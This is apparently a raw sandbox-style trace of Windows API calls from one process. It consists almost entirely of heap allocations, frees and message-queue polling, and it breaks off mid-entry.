0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.627] GetLastError () returned 0x6 [0257.627] SetLastError (dwErrCode=0x6) [0257.627] GetLastError () returned 0x6 [0257.627] SetLastError (dwErrCode=0x6) [0257.627] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.627] GetLastError () returned 0x6 [0257.627] GetLastError () returned 0x6 [0257.627] SetLastError (dwErrCode=0x6) [0257.627] GetLastError () returned 0x6 [0257.627] SetLastError (dwErrCode=0x6) [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d78 | out: hHeap=0xbc0000) returned 1 [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.627] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.627] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d2f8 [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d2f8 | out: hHeap=0xbc0000) returned 1 [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.627] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.628] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.628] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.628] QueryPerformanceCounter (in: lpPerformanceCount=0x7dfa28 | out: lpPerformanceCount=0x7dfa28*=18812360904) returned 1 [0257.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.628] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.628] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe190 | out: hHeap=0xbc0000) returned 1 [0257.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc018f8 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d78 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.628] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda600 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.628] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.629] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1e0 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b88 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b08 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b20 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.629] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b20 | out: hHeap=0xbc0000) returned 1 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b20 [0257.629] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01978 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d48 [0257.629] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b68 [0257.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0257.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.630] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.630] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.630] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.630] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.630] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01938 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.631] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b18 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.631] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.631] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01938 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.632] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.632] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b48 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b38 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.632] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.632] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.633] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.633] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.633] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.633] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.633] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.634] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.634] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.634] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.634] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.634] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, 